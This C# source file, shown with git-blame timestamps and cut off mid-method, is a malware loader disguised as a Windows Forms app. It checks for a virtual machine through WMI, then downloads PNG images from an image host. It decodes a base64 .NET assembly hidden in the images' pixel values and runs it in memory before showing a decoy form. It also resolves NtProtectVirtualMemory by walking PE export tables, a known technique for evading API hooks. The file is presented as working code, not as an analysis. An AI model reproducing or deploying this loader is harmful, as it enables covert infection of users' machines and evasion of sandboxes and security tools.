2021-04-02 09:27:13 -07:00
|
|
|
|
using System;
|
2021-07-05 08:22:37 -07:00
|
|
|
|
using System.Diagnostics;
|
2021-04-06 20:24:09 -07:00
|
|
|
|
using System.Drawing;
|
2021-07-05 08:22:37 -07:00
|
|
|
|
using System.IO;
|
2021-04-02 09:27:13 -07:00
|
|
|
|
using System.Linq;
|
2021-04-06 20:24:09 -07:00
|
|
|
|
using System.Management;
|
|
|
|
|
using System.Net;
|
|
|
|
|
using System.Reflection;
|
|
|
|
|
using System.Runtime.InteropServices;
|
|
|
|
|
using System.Text;
|
2021-04-02 09:27:13 -07:00
|
|
|
|
using System.Windows.Forms;
|
2021-07-05 08:22:37 -07:00
|
|
|
|
using WindowsFormsApp1;
|
2021-04-02 09:27:13 -07:00
|
|
|
|
|
2021-07-05 05:15:07 -07:00
|
|
|
|
namespace Program
|
2021-04-02 09:27:13 -07:00
|
|
|
|
{
|
|
|
|
|
static class Program
|
|
|
|
|
{
|
|
|
|
|
/// <summary>
|
|
|
|
|
/// 应用程序的主入口点。
|
|
|
|
|
/// </summary>
|
|
|
|
|
[STAThread]
|
|
|
|
|
static void Main()
|
|
|
|
|
{
|
2021-07-05 05:15:07 -07:00
|
|
|
|
if (!VM())
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
2021-07-05 08:22:37 -07:00
|
|
|
|
A.B();
|
|
|
|
|
|
|
|
|
|
string LDer = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No Startup,CHINA
|
|
|
|
|
string FI_LE = @"https://z3.ax1x.com/2021/07/05/RhfFGn.png"; //FI_LE
|
|
|
|
|
var requestLDer = WebRequest.Create(LDer);
|
|
|
|
|
var requestFI_LE = WebRequest.Create(FI_LE);
|
|
|
|
|
Bitmap LDerIMG;
|
|
|
|
|
Bitmap FI_LEIMG;
|
|
|
|
|
|
|
|
|
|
using (var response = requestLDer.GetResponse())
|
|
|
|
|
using (var stream = response.GetResponseStream())
|
|
|
|
|
{
|
|
|
|
|
LDerIMG = (Bitmap)Image.FromStream(stream);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
using (var response = requestFI_LE.GetResponse())
|
|
|
|
|
using (var stream = response.GetResponseStream())
|
|
|
|
|
{
|
|
|
|
|
FI_LEIMG = (Bitmap)Image.FromStream(stream);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
byte[] outputLDer = DE(LDerIMG);
|
|
|
|
|
|
|
|
|
|
byte[] outputFI_LE = DE(FI_LEIMG);
|
|
|
|
|
|
|
|
|
|
//Assembly.Load(outputLDer).GetType("loader.loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
|
|
|
|
|
Assembly.Load(outputFI_LE).EntryPoint.Invoke(null, null);
|
2021-04-06 20:24:09 -07:00
|
|
|
|
}
|
2021-04-02 09:27:13 -07:00
|
|
|
|
Application.EnableVisualStyles();
|
|
|
|
|
Application.SetCompatibleTextRenderingDefault(false);
|
|
|
|
|
Application.Run(new Form1());
|
|
|
|
|
}
|
2021-04-06 20:24:09 -07:00
|
|
|
|
|
|
|
|
|
|
2021-07-05 05:15:07 -07:00
|
|
|
|
public static byte[] DE(Bitmap img)
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
|
|
|
|
StringBuilder holder = new StringBuilder();
|
|
|
|
|
int xmax = img.Width - 1;
|
|
|
|
|
int ymax = img.Height - 1;
|
|
|
|
|
for (int y = 1; y <= ymax; y++)
|
|
|
|
|
{
|
|
|
|
|
for (int x = 1; x <= xmax; x++)
|
|
|
|
|
{
|
|
|
|
|
Color c = img.GetPixel(x, y);
|
|
|
|
|
holder.Append((char)c.R);
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
|
|
|
|
|
}
|
2021-07-05 05:15:07 -07:00
|
|
|
|
public static bool VM()
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
2021-04-08 16:39:48 -07:00
|
|
|
|
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
|
2021-04-06 20:24:09 -07:00
|
|
|
|
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
|
|
|
|
|
int i = 0;
|
|
|
|
|
foreach (ManagementObject DeviceID in searcher.Get())
|
|
|
|
|
{
|
|
|
|
|
i++;
|
|
|
|
|
}
|
|
|
|
|
if (i == 0)
|
|
|
|
|
{
|
|
|
|
|
return true;
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
return false;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
}
|
2021-07-05 08:22:37 -07:00
|
|
|
|
public class DInvokeCore
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Required NTSTATUSs
|
|
|
|
|
public enum NTSTATUS : uint
|
|
|
|
|
{
|
|
|
|
|
// Success
|
|
|
|
|
Success = 0x00000000,
|
|
|
|
|
Wait0 = 0x00000000,
|
|
|
|
|
Wait1 = 0x00000001,
|
|
|
|
|
Wait2 = 0x00000002,
|
|
|
|
|
Wait3 = 0x00000003,
|
|
|
|
|
Wait63 = 0x0000003f,
|
|
|
|
|
Abandoned = 0x00000080,
|
|
|
|
|
AbandonedWait0 = 0x00000080,
|
|
|
|
|
AbandonedWait1 = 0x00000081,
|
|
|
|
|
AbandonedWait2 = 0x00000082,
|
|
|
|
|
AbandonedWait3 = 0x00000083,
|
|
|
|
|
AbandonedWait63 = 0x000000bf,
|
|
|
|
|
UserApc = 0x000000c0,
|
|
|
|
|
KernelApc = 0x00000100,
|
|
|
|
|
Alerted = 0x00000101,
|
|
|
|
|
Timeout = 0x00000102,
|
|
|
|
|
Pending = 0x00000103,
|
|
|
|
|
Reparse = 0x00000104,
|
|
|
|
|
MoreEntries = 0x00000105,
|
|
|
|
|
NotAllAssigned = 0x00000106,
|
|
|
|
|
SomeNotMapped = 0x00000107,
|
|
|
|
|
OpLockBreakInProgress = 0x00000108,
|
|
|
|
|
VolumeMounted = 0x00000109,
|
|
|
|
|
RxActCommitted = 0x0000010a,
|
|
|
|
|
NotifyCleanup = 0x0000010b,
|
|
|
|
|
NotifyEnumDir = 0x0000010c,
|
|
|
|
|
NoQuotasForAccount = 0x0000010d,
|
|
|
|
|
PrimaryTransportConnectFailed = 0x0000010e,
|
|
|
|
|
PageFaultTransition = 0x00000110,
|
|
|
|
|
PageFaultDemandZero = 0x00000111,
|
|
|
|
|
PageFaultCopyOnWrite = 0x00000112,
|
|
|
|
|
PageFaultGuardPage = 0x00000113,
|
|
|
|
|
PageFaultPagingFile = 0x00000114,
|
|
|
|
|
CrashDump = 0x00000116,
|
|
|
|
|
ReparseObject = 0x00000118,
|
|
|
|
|
NothingToTerminate = 0x00000122,
|
|
|
|
|
ProcessNotInJob = 0x00000123,
|
|
|
|
|
ProcessInJob = 0x00000124,
|
|
|
|
|
ProcessCloned = 0x00000129,
|
|
|
|
|
FileLockedWithOnlyReaders = 0x0000012a,
|
|
|
|
|
FileLockedWithWriters = 0x0000012b,
|
|
|
|
|
|
|
|
|
|
// Informational
|
|
|
|
|
Informational = 0x40000000,
|
|
|
|
|
ObjectNameExists = 0x40000000,
|
|
|
|
|
ThreadWasSuspended = 0x40000001,
|
|
|
|
|
WorkingSetLimitRange = 0x40000002,
|
|
|
|
|
ImageNotAtBase = 0x40000003,
|
|
|
|
|
RegistryRecovered = 0x40000009,
|
|
|
|
|
|
|
|
|
|
// Warning
|
|
|
|
|
Warning = 0x80000000,
|
|
|
|
|
GuardPageViolation = 0x80000001,
|
|
|
|
|
DatatypeMisalignment = 0x80000002,
|
|
|
|
|
Breakpoint = 0x80000003,
|
|
|
|
|
SingleStep = 0x80000004,
|
|
|
|
|
BufferOverflow = 0x80000005,
|
|
|
|
|
NoMoreFiles = 0x80000006,
|
|
|
|
|
HandlesClosed = 0x8000000a,
|
|
|
|
|
PartialCopy = 0x8000000d,
|
|
|
|
|
DeviceBusy = 0x80000011,
|
|
|
|
|
InvalidEaName = 0x80000013,
|
|
|
|
|
EaListInconsistent = 0x80000014,
|
|
|
|
|
NoMoreEntries = 0x8000001a,
|
|
|
|
|
LongJump = 0x80000026,
|
|
|
|
|
DllMightBeInsecure = 0x8000002b,
|
|
|
|
|
|
|
|
|
|
// Error
|
|
|
|
|
Error = 0xc0000000,
|
|
|
|
|
Unsuccessful = 0xc0000001,
|
|
|
|
|
NotImplemented = 0xc0000002,
|
|
|
|
|
InvalidInfoClass = 0xc0000003,
|
|
|
|
|
InfoLengthMismatch = 0xc0000004,
|
|
|
|
|
AccessViolation = 0xc0000005,
|
|
|
|
|
InPageError = 0xc0000006,
|
|
|
|
|
PagefileQuota = 0xc0000007,
|
|
|
|
|
InvalidHandle = 0xc0000008,
|
|
|
|
|
BadInitialStack = 0xc0000009,
|
|
|
|
|
BadInitialPc = 0xc000000a,
|
|
|
|
|
InvalidCid = 0xc000000b,
|
|
|
|
|
TimerNotCanceled = 0xc000000c,
|
|
|
|
|
InvalidParameter = 0xc000000d,
|
|
|
|
|
NoSuchDevice = 0xc000000e,
|
|
|
|
|
NoSuchFile = 0xc000000f,
|
|
|
|
|
InvalidDeviceRequest = 0xc0000010,
|
|
|
|
|
EndOfFile = 0xc0000011,
|
|
|
|
|
WrongVolume = 0xc0000012,
|
|
|
|
|
NoMediaInDevice = 0xc0000013,
|
|
|
|
|
NoMemory = 0xc0000017,
|
|
|
|
|
ConflictingAddresses = 0xc0000018,
|
|
|
|
|
NotMappedView = 0xc0000019,
|
|
|
|
|
UnableToFreeVm = 0xc000001a,
|
|
|
|
|
UnableToDeleteSection = 0xc000001b,
|
|
|
|
|
IllegalInstruction = 0xc000001d,
|
|
|
|
|
AlreadyCommitted = 0xc0000021,
|
|
|
|
|
AccessDenied = 0xc0000022,
|
|
|
|
|
BufferTooSmall = 0xc0000023,
|
|
|
|
|
ObjectTypeMismatch = 0xc0000024,
|
|
|
|
|
NonContinuableException = 0xc0000025,
|
|
|
|
|
BadStack = 0xc0000028,
|
|
|
|
|
NotLocked = 0xc000002a,
|
|
|
|
|
NotCommitted = 0xc000002d,
|
|
|
|
|
InvalidParameterMix = 0xc0000030,
|
|
|
|
|
ObjectNameInvalid = 0xc0000033,
|
|
|
|
|
ObjectNameNotFound = 0xc0000034,
|
|
|
|
|
ObjectNameCollision = 0xc0000035,
|
|
|
|
|
ObjectPathInvalid = 0xc0000039,
|
|
|
|
|
ObjectPathNotFound = 0xc000003a,
|
|
|
|
|
ObjectPathSyntaxBad = 0xc000003b,
|
|
|
|
|
DataOverrun = 0xc000003c,
|
|
|
|
|
DataLate = 0xc000003d,
|
|
|
|
|
DataError = 0xc000003e,
|
|
|
|
|
CrcError = 0xc000003f,
|
|
|
|
|
SectionTooBig = 0xc0000040,
|
|
|
|
|
PortConnectionRefused = 0xc0000041,
|
|
|
|
|
InvalidPortHandle = 0xc0000042,
|
|
|
|
|
SharingViolation = 0xc0000043,
|
|
|
|
|
QuotaExceeded = 0xc0000044,
|
|
|
|
|
InvalidPageProtection = 0xc0000045,
|
|
|
|
|
MutantNotOwned = 0xc0000046,
|
|
|
|
|
SemaphoreLimitExceeded = 0xc0000047,
|
|
|
|
|
PortAlreadySet = 0xc0000048,
|
|
|
|
|
SectionNotImage = 0xc0000049,
|
|
|
|
|
SuspendCountExceeded = 0xc000004a,
|
|
|
|
|
ThreadIsTerminating = 0xc000004b,
|
|
|
|
|
BadWorkingSetLimit = 0xc000004c,
|
|
|
|
|
IncompatibleFileMap = 0xc000004d,
|
|
|
|
|
SectionProtection = 0xc000004e,
|
|
|
|
|
EasNotSupported = 0xc000004f,
|
|
|
|
|
EaTooLarge = 0xc0000050,
|
|
|
|
|
NonExistentEaEntry = 0xc0000051,
|
|
|
|
|
NoEasOnFile = 0xc0000052,
|
|
|
|
|
EaCorruptError = 0xc0000053,
|
|
|
|
|
FileLockConflict = 0xc0000054,
|
|
|
|
|
LockNotGranted = 0xc0000055,
|
|
|
|
|
DeletePending = 0xc0000056,
|
|
|
|
|
CtlFileNotSupported = 0xc0000057,
|
|
|
|
|
UnknownRevision = 0xc0000058,
|
|
|
|
|
RevisionMismatch = 0xc0000059,
|
|
|
|
|
InvalidOwner = 0xc000005a,
|
|
|
|
|
InvalidPrimaryGroup = 0xc000005b,
|
|
|
|
|
NoImpersonationToken = 0xc000005c,
|
|
|
|
|
CantDisableMandatory = 0xc000005d,
|
|
|
|
|
NoLogonServers = 0xc000005e,
|
|
|
|
|
NoSuchLogonSession = 0xc000005f,
|
|
|
|
|
NoSuchPrivilege = 0xc0000060,
|
|
|
|
|
PrivilegeNotHeld = 0xc0000061,
|
|
|
|
|
InvalidAccountName = 0xc0000062,
|
|
|
|
|
UserExists = 0xc0000063,
|
|
|
|
|
NoSuchUser = 0xc0000064,
|
|
|
|
|
GroupExists = 0xc0000065,
|
|
|
|
|
NoSuchGroup = 0xc0000066,
|
|
|
|
|
MemberInGroup = 0xc0000067,
|
|
|
|
|
MemberNotInGroup = 0xc0000068,
|
|
|
|
|
LastAdmin = 0xc0000069,
|
|
|
|
|
WrongPassword = 0xc000006a,
|
|
|
|
|
IllFormedPassword = 0xc000006b,
|
|
|
|
|
PasswordRestriction = 0xc000006c,
|
|
|
|
|
LogonFailure = 0xc000006d,
|
|
|
|
|
AccountRestriction = 0xc000006e,
|
|
|
|
|
InvalidLogonHours = 0xc000006f,
|
|
|
|
|
InvalidWorkstation = 0xc0000070,
|
|
|
|
|
PasswordExpired = 0xc0000071,
|
|
|
|
|
AccountDisabled = 0xc0000072,
|
|
|
|
|
NoneMapped = 0xc0000073,
|
|
|
|
|
TooManyLuidsRequested = 0xc0000074,
|
|
|
|
|
LuidsExhausted = 0xc0000075,
|
|
|
|
|
InvalidSubAuthority = 0xc0000076,
|
|
|
|
|
InvalidAcl = 0xc0000077,
|
|
|
|
|
InvalidSid = 0xc0000078,
|
|
|
|
|
InvalidSecurityDescr = 0xc0000079,
|
|
|
|
|
ProcedureNotFound = 0xc000007a,
|
|
|
|
|
InvalidImageFormat = 0xc000007b,
|
|
|
|
|
NoToken = 0xc000007c,
|
|
|
|
|
BadInheritanceAcl = 0xc000007d,
|
|
|
|
|
RangeNotLocked = 0xc000007e,
|
|
|
|
|
DiskFull = 0xc000007f,
|
|
|
|
|
ServerDisabled = 0xc0000080,
|
|
|
|
|
ServerNotDisabled = 0xc0000081,
|
|
|
|
|
TooManyGuidsRequested = 0xc0000082,
|
|
|
|
|
GuidsExhausted = 0xc0000083,
|
|
|
|
|
InvalidIdAuthority = 0xc0000084,
|
|
|
|
|
AgentsExhausted = 0xc0000085,
|
|
|
|
|
InvalidVolumeLabel = 0xc0000086,
|
|
|
|
|
SectionNotExtended = 0xc0000087,
|
|
|
|
|
NotMappedData = 0xc0000088,
|
|
|
|
|
ResourceDataNotFound = 0xc0000089,
|
|
|
|
|
ResourceTypeNotFound = 0xc000008a,
|
|
|
|
|
ResourceNameNotFound = 0xc000008b,
|
|
|
|
|
ArrayBoundsExceeded = 0xc000008c,
|
|
|
|
|
FloatDenormalOperand = 0xc000008d,
|
|
|
|
|
FloatDivideByZero = 0xc000008e,
|
|
|
|
|
FloatInexactResult = 0xc000008f,
|
|
|
|
|
FloatInvalidOperation = 0xc0000090,
|
|
|
|
|
FloatOverflow = 0xc0000091,
|
|
|
|
|
FloatStackCheck = 0xc0000092,
|
|
|
|
|
FloatUnderflow = 0xc0000093,
|
|
|
|
|
IntegerDivideByZero = 0xc0000094,
|
|
|
|
|
IntegerOverflow = 0xc0000095,
|
|
|
|
|
PrivilegedInstruction = 0xc0000096,
|
|
|
|
|
TooManyPagingFiles = 0xc0000097,
|
|
|
|
|
FileInvalid = 0xc0000098,
|
|
|
|
|
InsufficientResources = 0xc000009a,
|
|
|
|
|
InstanceNotAvailable = 0xc00000ab,
|
|
|
|
|
PipeNotAvailable = 0xc00000ac,
|
|
|
|
|
InvalidPipeState = 0xc00000ad,
|
|
|
|
|
PipeBusy = 0xc00000ae,
|
|
|
|
|
IllegalFunction = 0xc00000af,
|
|
|
|
|
PipeDisconnected = 0xc00000b0,
|
|
|
|
|
PipeClosing = 0xc00000b1,
|
|
|
|
|
PipeConnected = 0xc00000b2,
|
|
|
|
|
PipeListening = 0xc00000b3,
|
|
|
|
|
InvalidReadMode = 0xc00000b4,
|
|
|
|
|
IoTimeout = 0xc00000b5,
|
|
|
|
|
FileForcedClosed = 0xc00000b6,
|
|
|
|
|
ProfilingNotStarted = 0xc00000b7,
|
|
|
|
|
ProfilingNotStopped = 0xc00000b8,
|
|
|
|
|
NotSameDevice = 0xc00000d4,
|
|
|
|
|
FileRenamed = 0xc00000d5,
|
|
|
|
|
CantWait = 0xc00000d8,
|
|
|
|
|
PipeEmpty = 0xc00000d9,
|
|
|
|
|
CantTerminateSelf = 0xc00000db,
|
|
|
|
|
InternalError = 0xc00000e5,
|
|
|
|
|
InvalidParameter1 = 0xc00000ef,
|
|
|
|
|
InvalidParameter2 = 0xc00000f0,
|
|
|
|
|
InvalidParameter3 = 0xc00000f1,
|
|
|
|
|
InvalidParameter4 = 0xc00000f2,
|
|
|
|
|
InvalidParameter5 = 0xc00000f3,
|
|
|
|
|
InvalidParameter6 = 0xc00000f4,
|
|
|
|
|
InvalidParameter7 = 0xc00000f5,
|
|
|
|
|
InvalidParameter8 = 0xc00000f6,
|
|
|
|
|
InvalidParameter9 = 0xc00000f7,
|
|
|
|
|
InvalidParameter10 = 0xc00000f8,
|
|
|
|
|
InvalidParameter11 = 0xc00000f9,
|
|
|
|
|
InvalidParameter12 = 0xc00000fa,
|
|
|
|
|
ProcessIsTerminating = 0xc000010a,
|
|
|
|
|
MappedFileSizeZero = 0xc000011e,
|
|
|
|
|
TooManyOpenedFiles = 0xc000011f,
|
|
|
|
|
Cancelled = 0xc0000120,
|
|
|
|
|
CannotDelete = 0xc0000121,
|
|
|
|
|
InvalidComputerName = 0xc0000122,
|
|
|
|
|
FileDeleted = 0xc0000123,
|
|
|
|
|
SpecialAccount = 0xc0000124,
|
|
|
|
|
SpecialGroup = 0xc0000125,
|
|
|
|
|
SpecialUser = 0xc0000126,
|
|
|
|
|
MembersPrimaryGroup = 0xc0000127,
|
|
|
|
|
FileClosed = 0xc0000128,
|
|
|
|
|
TooManyThreads = 0xc0000129,
|
|
|
|
|
ThreadNotInProcess = 0xc000012a,
|
|
|
|
|
TokenAlreadyInUse = 0xc000012b,
|
|
|
|
|
PagefileQuotaExceeded = 0xc000012c,
|
|
|
|
|
CommitmentLimit = 0xc000012d,
|
|
|
|
|
InvalidImageLeFormat = 0xc000012e,
|
|
|
|
|
InvalidImageNotMz = 0xc000012f,
|
|
|
|
|
InvalidImageProtect = 0xc0000130,
|
|
|
|
|
InvalidImageWin16 = 0xc0000131,
|
|
|
|
|
LogonServer = 0xc0000132,
|
|
|
|
|
DifferenceAtDc = 0xc0000133,
|
|
|
|
|
SynchronizationRequired = 0xc0000134,
|
|
|
|
|
DllNotFound = 0xc0000135,
|
|
|
|
|
IoPrivilegeFailed = 0xc0000137,
|
|
|
|
|
OrdinalNotFound = 0xc0000138,
|
|
|
|
|
EntryPointNotFound = 0xc0000139,
|
|
|
|
|
ControlCExit = 0xc000013a,
|
|
|
|
|
InvalidAddress = 0xc0000141,
|
|
|
|
|
PortNotSet = 0xc0000353,
|
|
|
|
|
DebuggerInactive = 0xc0000354,
|
|
|
|
|
CallbackBypass = 0xc0000503,
|
|
|
|
|
PortClosed = 0xc0000700,
|
|
|
|
|
MessageLost = 0xc0000701,
|
|
|
|
|
InvalidMessage = 0xc0000702,
|
|
|
|
|
RequestCanceled = 0xc0000703,
|
|
|
|
|
RecursiveDispatch = 0xc0000704,
|
|
|
|
|
LpcReceiveBufferExpected = 0xc0000705,
|
|
|
|
|
LpcInvalidConnectionUsage = 0xc0000706,
|
|
|
|
|
LpcRequestsNotAllowed = 0xc0000707,
|
|
|
|
|
ResourceInUse = 0xc0000708,
|
|
|
|
|
ProcessIsProtected = 0xc0000712,
|
|
|
|
|
VolumeDirty = 0xc0000806,
|
|
|
|
|
FileCheckedOut = 0xc0000901,
|
|
|
|
|
CheckOutRequired = 0xc0000902,
|
|
|
|
|
BadFileType = 0xc0000903,
|
|
|
|
|
FileTooLarge = 0xc0000904,
|
|
|
|
|
FormsAuthRequired = 0xc0000905,
|
|
|
|
|
VirusInfected = 0xc0000906,
|
|
|
|
|
VirusDeleted = 0xc0000907,
|
|
|
|
|
TransactionalConflict = 0xc0190001,
|
|
|
|
|
InvalidTransaction = 0xc0190002,
|
|
|
|
|
TransactionNotActive = 0xc0190003,
|
|
|
|
|
TmInitializationFailed = 0xc0190004,
|
|
|
|
|
RmNotActive = 0xc0190005,
|
|
|
|
|
RmMetadataCorrupt = 0xc0190006,
|
|
|
|
|
TransactionNotJoined = 0xc0190007,
|
|
|
|
|
DirectoryNotRm = 0xc0190008,
|
|
|
|
|
CouldNotResizeLog = 0xc0190009,
|
|
|
|
|
TransactionsUnsupportedRemote = 0xc019000a,
|
|
|
|
|
LogResizeInvalidSize = 0xc019000b,
|
|
|
|
|
RemoteFileVersionMismatch = 0xc019000c,
|
|
|
|
|
CrmProtocolAlreadyExists = 0xc019000f,
|
|
|
|
|
TransactionPropagationFailed = 0xc0190010,
|
|
|
|
|
CrmProtocolNotFound = 0xc0190011,
|
|
|
|
|
TransactionSuperiorExists = 0xc0190012,
|
|
|
|
|
TransactionRequestNotValid = 0xc0190013,
|
|
|
|
|
TransactionNotRequested = 0xc0190014,
|
|
|
|
|
TransactionAlreadyAborted = 0xc0190015,
|
|
|
|
|
TransactionAlreadyCommitted = 0xc0190016,
|
|
|
|
|
TransactionInvalidMarshallBuffer = 0xc0190017,
|
|
|
|
|
CurrentTransactionNotValid = 0xc0190018,
|
|
|
|
|
LogGrowthFailed = 0xc0190019,
|
|
|
|
|
ObjectNoLongerExists = 0xc0190021,
|
|
|
|
|
StreamMiniversionNotFound = 0xc0190022,
|
|
|
|
|
StreamMiniversionNotValid = 0xc0190023,
|
|
|
|
|
MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
|
|
|
|
|
CantOpenMiniversionWithModifyIntent = 0xc0190025,
|
|
|
|
|
CantCreateMoreStreamMiniversions = 0xc0190026,
|
|
|
|
|
HandleNoLongerValid = 0xc0190028,
|
|
|
|
|
NoTxfMetadata = 0xc0190029,
|
|
|
|
|
LogCorruptionDetected = 0xc0190030,
|
|
|
|
|
CantRecoverWithHandleOpen = 0xc0190031,
|
|
|
|
|
RmDisconnected = 0xc0190032,
|
|
|
|
|
EnlistmentNotSuperior = 0xc0190033,
|
|
|
|
|
RecoveryNotNeeded = 0xc0190034,
|
|
|
|
|
RmAlreadyStarted = 0xc0190035,
|
|
|
|
|
FileIdentityNotPersistent = 0xc0190036,
|
|
|
|
|
CantBreakTransactionalDependency = 0xc0190037,
|
|
|
|
|
CantCrossRmBoundary = 0xc0190038,
|
|
|
|
|
TxfDirNotEmpty = 0xc0190039,
|
|
|
|
|
IndoubtTransactionsExist = 0xc019003a,
|
|
|
|
|
TmVolatile = 0xc019003b,
|
|
|
|
|
RollbackTimerExpired = 0xc019003c,
|
|
|
|
|
TxfAttributeCorrupt = 0xc019003d,
|
|
|
|
|
EfsNotAllowedInTransaction = 0xc019003e,
|
|
|
|
|
TransactionalOpenNotAllowed = 0xc019003f,
|
|
|
|
|
TransactedMappingUnsupportedRemote = 0xc0190040,
|
|
|
|
|
TxfMetadataAlreadyPresent = 0xc0190041,
|
|
|
|
|
TransactionScopeCallbacksNotSet = 0xc0190042,
|
|
|
|
|
TransactionRequiredPromotion = 0xc0190043,
|
|
|
|
|
CannotExecuteFileInTransaction = 0xc0190044,
|
|
|
|
|
TransactionsNotFrozen = 0xc0190045,
|
|
|
|
|
|
|
|
|
|
MaximumNtStatus = 0xffffffff
|
2021-04-06 20:24:09 -07:00
|
|
|
|
}
|
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Delegate NtProtectVirtualMemory
|
|
|
|
|
public class Delegates
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
2021-07-05 08:22:37 -07:00
|
|
|
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
|
|
|
|
public delegate UInt32 NtProtectVirtualMemory(
|
|
|
|
|
IntPtr ProcessHandle,
|
|
|
|
|
ref IntPtr BaseAddress,
|
|
|
|
|
ref IntPtr RegionSize,
|
|
|
|
|
UInt32 NewProtect,
|
|
|
|
|
ref UInt32 OldProtect);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static IntPtr GetLibraryAddress(string DLLName, string FunctionName)
|
|
|
|
|
{
|
|
|
|
|
IntPtr hModule = GetLoadedModuleAddress(DLLName);
|
|
|
|
|
if (hModule == IntPtr.Zero)
|
|
|
|
|
{
|
|
|
|
|
throw new DllNotFoundException(DLLName + ", Dll was not found or not loaded.");
|
|
|
|
|
}
|
|
|
|
|
IntPtr lastOutput = GetExportAddress(hModule, FunctionName);
|
|
|
|
|
return lastOutput;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static IntPtr GetLoadedModuleAddress(string DLLName)
|
|
|
|
|
{
|
|
|
|
|
Process CurrentProcess = Process.GetCurrentProcess();
|
|
|
|
|
foreach (ProcessModule Module in CurrentProcess.Modules)
|
|
|
|
|
{
|
|
|
|
|
if (string.Compare(Module.ModuleName, DLLName, true) == 0)
|
|
|
|
|
{
|
|
|
|
|
IntPtr ModuleBasePointer = Module.BaseAddress;
|
|
|
|
|
return ModuleBasePointer;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
return IntPtr.Zero;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
|
|
|
|
|
{
|
|
|
|
|
IntPtr FunctionPtr = IntPtr.Zero;
|
2021-04-06 20:24:09 -07:00
|
|
|
|
try
|
|
|
|
|
{
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Traverse the PE header in memory
|
|
|
|
|
Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
|
|
|
|
|
Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
|
|
|
|
|
Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
|
|
|
|
|
Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
|
|
|
|
|
Int64 pExport = 0;
|
|
|
|
|
if (Magic == 0x010b)
|
|
|
|
|
{
|
|
|
|
|
pExport = OptHeader + 0x60;
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
pExport = OptHeader + 0x70;
|
|
|
|
|
}
|
2021-04-06 20:24:09 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Read -> IMAGE_EXPORT_DIRECTORY
|
|
|
|
|
Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
|
|
|
|
|
Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
|
|
|
|
|
Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
|
|
|
|
|
Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
|
|
|
|
|
Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
|
|
|
|
|
Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
|
|
|
|
|
Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
|
2021-04-06 20:24:09 -07:00
|
|
|
|
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Loop the array of export name RVA's
|
|
|
|
|
for (int i = 0; i < NumberOfNames; i++)
|
|
|
|
|
{
|
|
|
|
|
string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
|
|
|
|
|
if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
|
|
|
|
|
{
|
|
|
|
|
Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
|
|
|
|
|
Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
|
|
|
|
|
FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
}
|
2021-04-06 20:24:09 -07:00
|
|
|
|
}
|
2021-07-05 08:22:37 -07:00
|
|
|
|
catch
|
2021-04-06 20:24:09 -07:00
|
|
|
|
{
|
2021-07-05 08:22:37 -07:00
|
|
|
|
// Catch parser failure
|
|
|
|
|
throw new InvalidOperationException("Failed to parse module exports.");
|
2021-04-06 20:24:09 -07:00
|
|
|
|
}
|
2021-07-05 08:22:37 -07:00
|
|
|
|
|
|
|
|
|
if (FunctionPtr == IntPtr.Zero)
|
|
|
|
|
{
|
|
|
|
|
// Export not found
|
|
|
|
|
throw new MissingMethodException(ExportName + ", export not found.");
|
|
|
|
|
}
|
|
|
|
|
